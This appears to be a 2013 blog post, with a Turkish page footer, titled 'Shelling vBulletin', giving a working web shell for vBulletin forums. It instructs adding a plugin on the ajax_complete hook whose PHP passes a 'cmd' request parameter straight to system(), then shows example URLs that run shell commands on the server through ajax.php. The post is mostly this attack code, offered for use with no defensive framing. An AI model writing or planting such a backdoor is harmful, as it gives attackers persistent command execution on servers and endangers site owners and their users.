4 Kasım 2013 Pazartesi

Shelling vBulletin [All Version ]

Add a plugin. Make it for Ajax_complete and in the code area add :

Code:

if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}

Activate the mod.

Code:

http://www.site.com/forumlocation/ajax.php?cmd=command

Exemple :

Code:

http://www.site.com/forumlocation/ajax.php?cmd=ls

Hiç yorum yok:

Yorum Gönder